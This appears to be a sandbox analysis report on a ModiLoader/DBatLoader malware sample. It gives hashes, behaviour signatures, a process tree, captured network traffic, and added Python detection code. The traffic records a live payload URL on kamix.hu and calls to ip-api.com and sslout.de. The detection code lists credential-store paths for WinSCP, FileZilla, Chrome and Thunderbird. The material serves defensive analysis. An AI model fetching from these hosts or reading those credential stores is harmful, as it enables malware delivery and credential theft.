Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/05/2024, 01:29 UTC

General

  • Target

    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe

  • Size

    1.7MB

  • MD5

    ba58a19a6475eff2c5bb9b6dfc7d9dd3

  • SHA1

    407eda96d6cc766e17a6a27cf37cc63dd82537f3

  • SHA256

    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57

  • SHA512

    6e53a2642c36cddc8cad22ca898c358d3393bd0a880fb5d364cb4aa38ef200b9b0b06dd03a13d05ef91e9867cb172eb2e05a021f0b28282028f8a1eaacdaf9e0

  • SSDEEP

    49152:mirGmwDGQ15rlkRH/7CG+xJZAOALfrSUv15gmm7kqQILp5ibWkT:miimqzwOALfrSUv15gmm7kqQILp5

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader (also tracked as DBatLoader) is a Delphi-written loader that abuses legitimate cloud and web hosting to fetch follow-on malware families. In this run the first stage retrieved an 802,976-byte object from kamix.hu and launched a dropped 66KB huqnearJ.pif from C:\Users\Public\Libraries; that child process is the one attributed to the ip-api.com and sslout.de traffic below.

  • ModiLoader Second Stage 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service. Note that the request in this run (http://ip-api.com/line/?fields=hosting) asks only for the "hosting" field, i.e. whether the egress IP belongs to a hosting or datacenter range, which functions as a sandbox/VM check rather than a plain external-IP lookup.

  • Suspicious use of SetThreadContext 1 IoCs
  • Script User-Agent 1 IoCs

    Uses a user-agent string associated with a script host: "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" is the default user-agent of the WinHttpRequest COM object, which is normally driven from VBScript, JScript or similar automation rather than a browser.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    "C:\Users\Admin\AppData\Local\Temp\22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Users\Public\Libraries\huqnearJ.pif
      C:\Users\Public\Libraries\huqnearJ.pif
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4068
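
The process tree above (a %TEMP% parent launching a .pif dropped into C:\Users\Public\Libraries) together with the "Reads ..." credential-store signatures is the kind of pattern an endpoint rule should catch. The following is an added example, not tria.ge code or detection logic from the report: it evaluates constructed process-creation and file/registry-read events (the event schema is invented and only loosely follows Sysmon) against both behaviours. The credential-store locations are the well-known ones the signatures refer to (WinSCP's HKCU\Software\Martin Prikryl\WinSCP 2\Sessions key, FileZilla's sitemanager.xml and recentservers.xml, Chrome's Login Data, Thunderbird profiles); the specific PIDs and paths in the sample events mirror this report but the events themselves are constructed.

```python
"""Score constructed endpoint telemetry against the behaviour this report shows.

Added example, not tria.ge code. Event records are constructed to mirror the
process tree above (PID 2356 -> 4068) and the credential-store reads listed
under Signatures; the field names are invented and loosely follow Sysmon.
"""
import re
from collections import defaultdict

# Well-known credential-store locations the "Reads ..." signatures refer to.
# Patterns are regexes applied to the lower-cased file path or registry key.
CREDENTIAL_STORES = {
    "winscp":  r"software\\martin prikryl\\winscp 2\\sessions",
    "ftp":     r"\\appdata\\roaming\\filezilla\\(sitemanager|recentservers)\.xml$",
    "browser": r"\\appdata\\local\\google\\chrome\\user data\\.*\\login data$",
    "email":   r"\\appdata\\roaming\\thunderbird\\profiles\\",
}

# Executable dropped into the world-writable Public\Libraries folder ...
PUBLIC_LIBRARIES = re.compile(r"^c:\\users\\public\\libraries\\[^\\]+\.(pif|exe|scr|com)$", re.I)
# ... launched by something running out of a user's %TEMP%.
TEMP_DIR = re.compile(r"^c:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)


def is_temp_to_public_drop(event):
    """ProcessCreate where a %TEMP% parent starts a .pif/.exe from C:\\Users\\Public\\Libraries."""
    return (event["type"] == "ProcessCreate"
            and bool(TEMP_DIR.match(event["parent_image"]))
            and bool(PUBLIC_LIBRARIES.match(event["image"])))


def credential_store_hits(events):
    """Map pid -> set of credential-store categories it read (FileRead / RegistryRead)."""
    hits = defaultdict(set)
    for ev in events:
        if ev["type"] not in ("FileRead", "RegistryRead"):
            continue
        target = ev["target"].lower()
        for category, pattern in CREDENTIAL_STORES.items():
            if re.search(pattern, target):
                hits[ev["pid"]].add(category)
    return hits


def triage(events, min_categories=2):
    """Findings: drop-and-run chains, plus any process sweeping >= min_categories stores.

    A single category is normal (a browser reads its own Login Data); an
    infostealer touches several unrelated stores from one process.
    """
    findings = []
    for ev in events:
        if ev["type"] == "ProcessCreate" and is_temp_to_public_drop(ev):
            findings.append(("dropped_pif_from_temp", ev["pid"], ev["image"]))
    for pid, cats in credential_store_hits(events).items():
        if len(cats) >= min_categories:
            findings.append(("infostealer_credential_sweep", pid, sorted(cats)))
    return findings


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe"
# Constructed sample telemetry (not the report's raw logs).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 2356, "parent_image": r"C:\Windows\explorer.exe", "image": SAMPLE},
    {"type": "ProcessCreate", "pid": 4068, "parent_image": SAMPLE,
     "image": r"C:\Users\Public\Libraries\huqnearJ.pif"},
    {"type": "RegistryRead", "pid": 4068, "target": r"HKCU\Software\Martin Prikryl\WinSCP 2\Sessions"},
    {"type": "FileRead", "pid": 4068, "target": r"C:\Users\Admin\AppData\Roaming\FileZilla\sitemanager.xml"},
    {"type": "FileRead", "pid": 4068,
     "target": r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "FileRead", "pid": 4068,
     "target": r"C:\Users\Admin\AppData\Roaming\Thunderbird\Profiles\abcd.default\logins.json"},
    # Benign noise: Chrome itself reading Login Data must not trip the multi-store rule.
    {"type": "FileRead", "pid": 5120,
     "target": r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run stand-alone it prints two findings for PID 4068 (the drop-and-run chain and a four-category credential sweep) and nothing for the browser-only PID 5120. The multi-category threshold is the part worth keeping when adapting this to real EDR data: single-store reads are far too common to alert on.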

Network

  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=2B633A4D347A628D1C382ECC35C1631B; domain=.bing.com; expires=Tue, 10-Jun-2025 01:30:05 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E203CD298104488C836F168B0553DFA9 Ref B: LON04EDGE0810 Ref C: 2024-05-16T01:30:05Z
    date: Thu, 16 May 2024 01:30:05 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8On6eLEhfQPpLLi6eI4ca9jVUCUxBXa3teYfvxmPL61lVB35EOyoGJDxe2MhHEeRrzoJU_sMsnxcRryzagApTrDQYfoDKbz-MRw2t3HWMlMLkMfYOMmD2rRKmMeOiB5xM9l-Rwu2Zo1pzHuRlYfePjhyrZf45Ig15wx3hBUILIAbeWzUn%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D955e5cfb95f615ea39943ad03d67eee5&TIME=20240426T131420Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4 HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2B633A4D347A628D1C382ECC35C1631B; _EDGE_S=SID=2874138F0E9A6FD7122B070E0FF66E1F
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=UQsCzyzobKxJGkGY2ukeQpRxIVn6dJZpu00UGps76YA; domain=.bing.com; expires=Tue, 10-Jun-2025 01:30:05 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 11C96EC9491346E9872A3ACB6040FC5A Ref B: LON04EDGE0810 Ref C: 2024-05-16T01:30:05Z
    date: Thu, 16 May 2024 01:30:05 GMT
  • flag-be
    GET
    https://www.bing.com/aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
    Remote address:
    2.17.107.105:443
    Request
    GET /aes/c.gif?RG=6a29a8acbdab4f81a4b930eff69c0d43&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131420Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=2B633A4D347A628D1C382ECC35C1631B
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 838F9BFFA3B843C59BC04819558435C8 Ref B: BRU30EDGE0616 Ref C: 2024-05-16T01:30:05Z
    content-length: 0
    date: Thu, 16 May 2024 01:30:05 GMT
    set-cookie: _EDGE_S=SID=2874138F0E9A6FD7122B070E0FF66E1F; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=2B633A4D347A628D1C382ECC35C1631B; path=/; httponly; expires=Tue, 10-Jun-2025 01:30:05 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.656b1102.1715823005.52e95268
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    105.107.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    105.107.17.2.in-addr.arpa
    IN PTR
    Response
    105.107.17.2.in-addr.arpa
    IN PTR
    a2-17-107-105.deploy.static.akamaitechnologies.com
  • flag-be
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    2.17.107.105:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=2B633A4D347A628D1C382ECC35C1631B; _EDGE_S=SID=2874138F0E9A6FD7122B070E0FF66E1F; MSPTC=UQsCzyzobKxJGkGY2ukeQpRxIVn6dJZpu00UGps76YA; MUIDB=2B633A4D347A628D1C382ECC35C1631B
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Thu, 16 May 2024 01:30:06 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.656b1102.1715823006.52e95749
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    kamix.hu
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    Remote address:
    8.8.8.8:53
    Request
    kamix.hu
    IN A
    Response
    kamix.hu
    IN A
    37.17.172.136
  • flag-hu
    GET
    https://kamix.hu/255_Jraenquhwco
    22d6ea142dc14e08475c61aac8555f3996ef80701474865f2ed7db42cd9e2e57.exe
    Remote address:
    37.17.172.136:443
    Request
    GET /255_Jraenquhwco HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: kamix.hu
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2024 01:30:14 GMT
    Server: Apache
    Last-Modified: Tue, 14 May 2024 20:41:31 GMT
    Accept-Ranges: bytes
    Content-Length: 802976
    Cache-Control: s-maxage=10
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    136.172.17.37.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    136.172.17.37.in-addr.arpa
    IN PTR
    Response
    136.172.17.37.in-addr.arpa
    IN PTR
    web01-136.szerverplex.hu
  • flag-us
    DNS
    ip-api.com
    huqnearJ.pif
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    huqnearJ.pif
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2024 01:30:19 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 20
    X-Rl: 43
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-api.com
  • flag-us
    DNS
    sslout.de
    huqnearJ.pif
    Remote address:
    8.8.8.8:53
    Request
    sslout.de
    IN A
    Response
    sslout.de
    IN A
    134.119.18.23
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    35.15.31.184.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    35.15.31.184.in-addr.arpa
    IN PTR
    Response
    35.15.31.184.in-addr.arpa
    IN PTR
    a184-31-15-35.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    79.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.190.18.2.in-addr.arpa
    IN PTR
    Response
    79.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-79.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 555746
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4D59345877ED4AAF8BA473149AE7F137 Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F5EF69A177154B0F9D4FD2A183703ED4 Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F67825C00E5D4944AF3E70EDC8F22144 Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 638730
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F5D2D0F6665F4F858A5A4EBFA3B279DD Ref B: LON04EDGE1212 Ref C: 2024-05-16T01:31:42Z
    date: Thu, 16 May 2024 01:31:41 GMT
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001.a-msedge.net
  • 204.79.197.237:443
